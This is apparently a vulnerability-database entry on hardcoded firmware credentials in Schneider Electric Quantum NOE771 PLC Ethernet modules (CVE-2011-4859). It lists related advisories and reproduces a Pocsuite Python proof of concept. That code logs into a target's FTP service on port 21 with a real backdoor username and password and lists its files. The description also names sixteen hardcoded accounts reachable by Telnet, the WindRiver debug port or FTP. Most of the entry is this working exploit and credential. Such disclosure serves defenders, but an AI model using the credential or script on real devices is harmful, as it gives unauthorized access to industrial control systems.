施耐德(Schneider) PLC 以太网模块固件后门

🗓️ 09 Sep 2015 00:00:00Reported by FooyingType

Schneider PLC ethernet module firmware contains hardcoded FTP credentials in the TextFiles packag

Reporter	Title	Published	Views	Family All 14
Tenable Nessus	Schneider Electric Quantum Ethernet Module Multiple Versions Hardcoded Passwords	8 May 201900:00	–	nessus
Tenable Nessus	Schneider-electric Quantum Unspecified Vulnerability	8 Nov 201900:00	–	nessus
Tenable Nessus	Schneider Electric Quantum Ethernet Module Hard-Coded Credentials (CVE-2011-4859)	7 Feb 202200:00	–	nessus
BDU FSTEC	The vulnerability of the microprogramming software of Schneider Electric’s Modicon Quantum programmable logic controllers allows a malicious individual to gain unauthorized access to the device.	7 Jul 201600:00	–	bdu_fstec
BDU FSTEC	The vulnerability of Schneider Electric’s Quantum Ethernet Module allows a remote intruder to gain privileged access to the system.	21 Oct 201500:00	–	bdu_fstec
CVE	CVE-2011-4859	17 Dec 201111:00	–	cve
Cvelist	CVE-2011-4859	17 Dec 201111:00	–	cvelist
EUVD	EUVD-2011-4776	7 Oct 202500:30	–	euvd
ICS	Schneider Electric Quantum Ethernet Module Hard-Coded Credentials	21 Oct 201206:00	–	ics
NCSC	Vulnerabilities fixed in Schneider Electric products	14 May 202100:00	–	ncsc


                                                #!/usr/bin/env python
# -*- coding: utf-8 -*-

import ftplib
import urlparse
import socket
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class POC(POCBase):
    vulID = '89384'  # vul ID
    version = '1'
    author = 'Wyc'
    vulDate = '2014-05-15'
    createDate = '2015-09-05'
    updateDate = '2015-09-09'
    references = ['http://sebug.net/vuldb/ssvid-89384']
    name = '施耐德(Schneider) PLC 以太网模块固件后门'
    appPowerLink = 'http://www.schneider-electric.cn/zh/product-range/538-modicon-quantum?xtmc=Quantum&xtcr=1'
    appName = 'Schneider Quantum NOE771'
    appVersion = 'unkown'
    vulType = 'backdoor'
    desc = '''
    Schneider Electric Quantum Ethernet模块对 (1) AUTCSE (2) AUT_CSE
    (3) fdrusers (4) ftpuser(5)loader(6)nic2212(7)nimrohs2212
    (8) nip2212(9)noe77111_v500(10) ntpupdate(11) pcfactory(12) sysdiag
    (13) target(14) test(15) USER和(16) webserver accounts使用了硬编码方式输入密码，使得远程攻击者可借助
    (a) TELNET(b) Windriver Debug或者(c) FTP端口获取访问。
    '''
    # the sample sites for examine

    def _verify(self):
        output = Output(self)
        result = {}
        target = socket.gethostbyname(urlparse.urlsplit(self.url)[1])

        try:
            ftp = ftplib.FTP(timeout=5)
            ret = ftp.connect(host=target, port=21, timeout=5)
            welcome = ftp.connect(host=target, port=21, timeout=5)
            login = ftp.login(user='sysdiag', passwd='factorycast@schneider')
            ls = ftp.nlst()

            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

            output.success(result)
        except Exception, err:
            output.fail('Internet Nothing returned')

        return output

    def _attack(self):
        return self._verify()


register(POC)

09 Sep 2015 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.0404